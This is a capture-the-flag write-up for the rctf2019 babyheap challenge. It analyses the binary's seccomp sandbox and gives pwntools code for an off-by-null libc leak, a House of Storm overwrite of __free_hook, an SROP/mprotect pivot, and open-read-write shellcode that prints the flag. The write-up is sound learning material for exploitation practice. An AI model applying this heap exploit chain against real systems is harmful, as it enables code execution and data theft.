Triple-Happiness

2022-01-13

[Triple Happiness!] Learning House of Storm & SROP & ORW from one challenge

Actually I don’t want to write this article in English, but I have written half of it in English before…

rctf2019_babyheap binary

[*] '/home/giantbranch/Desktop/rctf_2019_babyheap/rctf_2019_babyheap'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Reverse Analysis

init()

mallopt(1, 0) fastbin is banned.

alarm(0x3Cu) alarm is annoying while debugging, sed -i s/alarm/isnan/g ./ProgrammName replace it with isnan().

prctl() sandbox enabled, forcing us to orw.

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x01 0x00 0xc000003e  if (A == ARCH_X86_64) goto 0003
 0002: 0x06 0x00 0x00 0x00000000  return KILL
 0003: 0x20 0x00 0x00 0x00000000  A = sys_number
 0004: 0x15 0x00 0x01 0x00000029  if (A != socket) goto 0006
 0005: 0x06 0x00 0x00 0x00000000  return KILL
 0006: 0x15 0x00 0x01 0x0000003b  if (A != execve) goto 0008
 0007: 0x06 0x00 0x00 0x00000000  return KILL
 0008: 0x15 0x00 0x01 0x00000039  if (A != fork) goto 0010
 0009: 0x06 0x00 0x00 0x00000000  return KILL
 0010: 0x15 0x00 0x01 0x0000009d  if (A != prctl) goto 0012
 0011: 0x06 0x00 0x00 0x00000000  return KILL
 0012: 0x15 0x00 0x01 0x0000003a  if (A != vfork) goto 0014
 0013: 0x06 0x00 0x00 0x00000000  return KILL
 0014: 0x15 0x00 0x01 0x00000065  if (A != ptrace) goto 0016
 0015: 0x06 0x00 0x00 0x00000000  return KILL
 0016: 0x15 0x00 0x01 0x0000003e  if (A != kill) goto 0018
 0017: 0x06 0x00 0x00 0x00000000  return KILL
 0018: 0x15 0x00 0x01 0x00000038  if (A != clone) goto 0020
 0019: 0x06 0x00 0x00 0x00000000  return KILL
 0020: 0x06 0x00 0x00 0x7fff0000  return ALLOW

add()

Program used calloc() instead of malloc(), making it impossible to hijack malloc_hook.

limit of chunk size is 0x100. We can have 16 chunks at most.

struct is simpe ptr|size

edit()

ptrs.ptr + read_n(ptrs.ptr, ptrs.size) = 0 Off by null existed.

we can hijack pre_inuse bit to trigger unlink.

LEAK

unlink –> chunk overlap –> unsortedbin leak

$ ./main_arena /lib/x86_64-linux-gnu/libc-2.23.so
[+]libc version : glibc 2.23
[+]build ID : BuildID[sha1]=30773be8cf5bfed9d910c8473dd44eaab2e705ab
[+]main_arena_offset : 0x3c4b20

#LEAK
add(0x80)#0
add(0x68)#1
add(0xf0)#2
add(0x18)#3
delete(0)
#gdb.attach(p)
payload = 'a'*0x60 + p64(0x100)
edit(1, payload)
delete(2)
add(0x80)#0
show(1)
mainarena = u64(p.recvuntil('\x7f').ljust(8, '\x00')) - 0x58
libcbase = mainarena - 0x3c4b20
prt("libcbase")

House of Storm

This chall remind me of another chall: 0ctf_2018_heapstorm2. Both of them ban the fastbin and use calloc. We can use house of storm to hijack free_hook.

#---------------------------------HOUSE OF STORM------------------------#
# prepare
add(0x18)   # 4
add(0x508)  # 5
add(0x18)   # 6
edit(5, 'h'*0x4f0 + p64(0x500))   #set fake prev_size

add(0x18)   # 7
add(0x508)  # 8
add(0x18)   # 9
edit(8, 'h'*0x4f0 + p64(0x500))   #set fake prev_size
add(0x18)   # 10

# off by null to overlap
delete(5)
edit(4, 'a'*(0x18))	# 	off by null
add(0x18)  # 5  
add(0x4d8)  # 11 
delete(5)
delete(6)  # extend
add(0x30)  # 5
add(0x4e8)  # 6. 6 and 11 overlap ,we can control 6 by editing 11

delete(8)
edit(7, 'a'*(0x18))
add(0x18)  # 8
add(0x4d8)  # 12
delete(8)
delete(9)
add(0x48)  # 8

# 6 -> UB,8 -> LB
delete(6)
add(0x4e8)    # 6
delete(6)

free_hook = libc.sym['__free_hook']
free_hook += libcbase
storage = free_hook
fake_chunk = storage - 0x20

# edit UB chunk's bk
payload =  p64(0)*2 + p64(0) + p64(0x4f1) #size
payload += p64(0) + p64(fake_chunk)      #bk
edit(11, payload)

# edit LB chunk's bk & bk_nextsize
payload =  p64(0)*4 + p64(0) + p64(0x4e1) #size
payload += p64(0) + p64(fake_chunk+8)    #bk, for creating the "bk" of the faked chunk to avoid crashing when unlinking from unsorted bin
payload += p64(0) + p64(fake_chunk-0x18-5)   #bk_nextsize, for creating the "size" of the faked chunk, using misalignment tricks
edit(12, flat(layout))

# try-except can be used here
add(0x48)  # 6

Now, we can control __free_hook by chunk 6.

SROP

However, execve is banned. We can use SROP to ORW.

The key to SROP is setcontext, this function can control registers(even the rip), we can hijack __free_hook to setcontext . Once we set the chunk well, we can control the programme by free the chunk.

Here, we use mprotect to set the chunk executable.

#-----------------------------SROP------------------------------#
new_execve_env = free_hook & 0xfffffffffffff000
shellcode1 = '''
xor rdi, rdi
mov rsi, %d
mov edx, 0x1000

mov eax, 0
syscall

jmp rsi
''' % new_execve_env

edit(6, 'a' * 0x10 + p64(libcbase + libc.symbols['setcontext'] + 53) + p64(free_hook + 0x10) + asm(shellcode1))

# pause()

frame = SigreturnFrame()
frame.rsp = free_hook + 8
frame.rip = libcbase + libc.symbols['mprotect'] # 0xa8 rcx
frame.rdi = new_execve_env
frame.rsi = 0x1000
frame.rdx = 4 | 2 | 1

edit(12, str(frame))
sdl('3')
rct('Index: ')
sdl('12')

ORW

Given that we have set the chunk executable, we can inject our shellcode to orw

#------------------------ORW-------------------------------#
shellcode2 = '''
mov rax, 0x67616c662f2e ;// ./flag
push rax

mov rdi, rsp ;// ./flag
mov rsi, 0 ;// O_RDONLY
xor rdx, rdx ;//
mov rax, 2 ;// SYS_open
syscall

mov rdi, rax ;// fd 
mov rsi,rsp  ;//
mov rdx, 1024 ;// nbytes
mov rax,0 ;// SYS_read
syscall

mov rdi, 1 ;// fd 
mov rsi, rsp ;// buf
mov rdx, rax ;// count 
mov rax, 1 ;// SYS_write
syscall

mov rdi, 0 ;// error_code
mov rax, 60
syscall
'''

p.send(asm(shellcode2))

懒得写异常处理了，多试几次也能拿到flag。